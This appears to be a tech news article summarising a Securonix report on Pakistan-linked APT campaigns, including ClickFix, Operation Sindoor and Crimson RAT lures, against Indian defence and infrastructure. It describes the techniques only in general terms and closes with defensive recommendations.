Security
In its May 2025 report, Securonix Threat Labs has flagged a sharp surge in cyberattacks on Indian digital infrastructure, with activity primarily traced to Pakistan-linked APT groups—notably APT36 (Transparent Tribe) and SideCopy. The report highlights a series of sophisticated campaigns—ClickFix, Operation Sindoor, and post-Baisaran attack cyber offensives—targeting India’s defense, telecom, healthcare, and government sectors.
The report states that Securonix Autonomous Threat Sweeper analyzed 3,059 TTPs and IoCs, identified 173 emerging threats, and escalated 4 major incidents in May. These threats primarily leveraged phishing, spoofed websites, and malicious Office documents to gain unauthorized access and steal sensitive data.
Operation Sindoor: A Coordinated Cyber Siege
The report states that Securonix Autonomous Threat Sweeper analyzed 3,059 TTPs and IoCs, identified 173 emerging threats, and escalated 4 major incidents in May. These threats primarily leveraged phishing, spoofed websites, and malicious Office documents to gain unauthorized access and steal sensitive data.
Operation Sindoor: A Coordinated Cyber Siege
A highly organized campaign, Operation Sindoor blended espionage with hacktivism. It used spear-phishing emails containing malicious .ppam, .lnk, and .msi files to infiltrate systems belonging to the Indian Ministry of Defence, DRDO, BSNL, Jio, AIIMS, and other critical entities. Attackers used LOLbins (living-off-the-land binaries), PowerShell obfuscation, UAC bypass, and Ares RAT for long-term persistence and control. Over 35 hacktivist groups collaborated on DDoS attacks and website defacements, coordinated via Telegram under hashtags like #OpIndia and #OperationSindoor.
ClickFix Campaign: Ministry of Defence Spoof
APT36 launched the ClickFix campaign by cloning government websites and embedding malware in fake links. Clicking the malicious “March 2025” link triggered platform-specific payloads. On Windows, a .hta file downloaded a .NET-based loader. On Linux, users were tricked into running a fake CAPTCHA, which executed a harmful shell script disguised as an image.
Post-Baisaran Valley Attack Surge
Following the April 22 terrorist attack in Pahalgam, cyberattacks intensified. Threat actors distributed malicious documents titled “Report & Update Regarding Pahalgam Terror Attack.ppam” to spread Crimson RAT, a remote access trojan used for credential theft and surveillance.
Securonix recommends implementing advanced email security, monitoring for malicious macros, blocking known threat domains, and tightening controls on PowerShell and mshta.exe usage. The Threat Labs team has published 139 IoCs to help enterprises detect and defend against these attacks.
The report underscores growing concerns around state-sponsored cyberattacks, Pakistan-linked threat actors, and the escalating cyber conflict targeting Indian defense and infrastructure sectors.
See What’s Next in Tech With the Fast Forward Newsletter
Tweets From @varindiamag
Nothing to see here - yet
When they Tweet, their Tweets will show up here.
